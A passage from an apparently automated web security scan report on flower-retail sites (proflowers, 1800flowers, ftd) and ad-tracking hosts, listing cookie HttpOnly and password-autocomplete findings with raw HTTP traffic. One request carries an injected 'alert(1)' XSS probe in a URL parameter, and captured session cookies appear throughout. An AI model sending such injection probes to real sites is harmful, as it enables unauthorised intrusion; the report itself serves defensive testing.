GET /rrserver/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304902894374&cn=Spring&c=10305&cts=http%3A%2F%2Fww30.1800flowers.com&pt=%7Ccategory_page.content&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800flowers.com%2Fcollection.do%3Fdataset%3D10305&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pvihc=b73.1303848202747.21158348%7C; pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:06:52 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: catvhc=d-eF0-g9tZ-B---%%; Expires=Sat, 27-May-2079 04:20:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 25372

var rr_recs={placements:[{used:false,placementType:'category_page.content',html:'<div class="rr_main" id="rrRecs"><div class="rr_strategy">Sitewide Top Sellers</div><div class="rr_recborder"><div cla
...[SNIP]...
13.54. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rrserver/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304902910725&cs=%7C10305%3ASpring&p=91637&re=Y&cts=http%3A%2F%2Fww30.1800flowers.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800flowers.com%2Fcollection.do%3Fdataset%3D10305&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pvihc=b73.1303848202747.21158348%7C; pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771; catvhc=d-eF0-g9tZ-B---%%

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:08:26 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b82.1304903306071.59433447%7C; Path=/
Set-Cookie: pvihc=b82.1304903306071.59433447%7C73.1303848202747.21158348%7C; Expires=Thu, 06-May-2021 01:08:26 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 11724

var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="rr_main_vert" id="rrRecs"><div class="rr_strategy_vert">People Who Viewed This Item Ultimately Bought</div><div
...[SNIP]...
13.55. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJND15BrQSKBAOAD4/P74="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:02:39 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 01:02:19 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8b9woJV/tjEJrH/yDGglUIADAEVAP+s="; Domain=invitemedia.com; expires=Tue, 08-May-2012 01:02:39 GMT; Path=/
Content-Length: 344

makePixelRequest("http://ad.yieldmanager.com/pixel?id=1095653&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script sr
...[SNIP]...
13.56. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s82534269827883

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 12:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3EC9C05010F51-40000101E0246B4D[CE]; Expires=Sat, 7 May 2016 12:08:24 GMT; Domain=.proflowers.com; Path=/
Location: http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&pccr=true&vidn=26E3EC9C05010F51-40000101E0246B4D&&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 12:08:24 GMT
Last-Modified: Tue, 10 May 2011 12:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www15
Content-Length: 0
Content-Type: text/plain

13.57. http://www.ftd.com/351  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /351

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:21 GMT
Location: http://www.ftd.com/351/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Mon, 09 May 2011 01:00:21 GMT
X-Varnish: 540312318
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/351/">h
...[SNIP]...
14. Password field with autocomplete enabled  previous  next
There are 9 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
<body>
<form name="form1" method="post" action="CustomerLogin.aspx?Ref=HomeNoRef" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" onkeydown="javascript:return EnterKeyPressed(event);">
<div>
...[SNIP]...
<td colspan="2"><input name="Login$tb_Password" type="password" maxlength="15" id="Login_tb_Password" /></td>
...[SNIP]...
14.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
<div id="innerContainer">
               <form name="aspnetForm" method="post" action="IdentifyCustomer.aspx?flexShown=False&amp;scAddItem=true&amp;flexChosen=False&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;selectedrelationshipID=293461&amp;op=new&amp;quantity=1&amp;Ref=HomeNoRef&amp;deliverydate=5%2f25%2f2011&amp;pid=30008396&amp;ssid=27&amp;COBRAND=pfc&amp;ShowGiftOptions=True&amp;trackingpgroup=PBS&amp;deliveryon=True" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</span> <input name="ctl00$OrderProcessPageBody$ctl05$tb_Password" type="password" maxlength="15" id="ctl00_OrderProcessPageBody_ctl05_tb_Password" class="SignInTextBox" /><br/>
...[SNIP]...
14.3. http://ww30.1800baskets.com/product.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /product.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000jc-mR2VDw7uBY5v5sZbAO-H:-1; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 660

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=11097&hospitalDataset=11096&funeralHomeDataset=11092&ruralRouteDataset=11093&dataset=11309&channel=&
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:18:24 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34787


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurr
...[SNIP]...
</tr>
                               <form action="https://ww30.1800baskets.com/signinaction.do" method="post" name="welcomesignin">
                                   
                                       <input type="hidden" name="welcomePage" value="error.do" />
...[SNIP]...
<br>
                                    <input type="password" style="width:100px" name="password" class="textfield" maxlength="64" onkeypress="if(event.keyCode==13){document.forms['welcomesignin'].submit();}" /><a class="arrowlink" href="javascript:document.forms['welcomesignin'].submit()">
...[SNIP]...
14.4. https://ww30.1800flowers.com/checkoutsignin.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
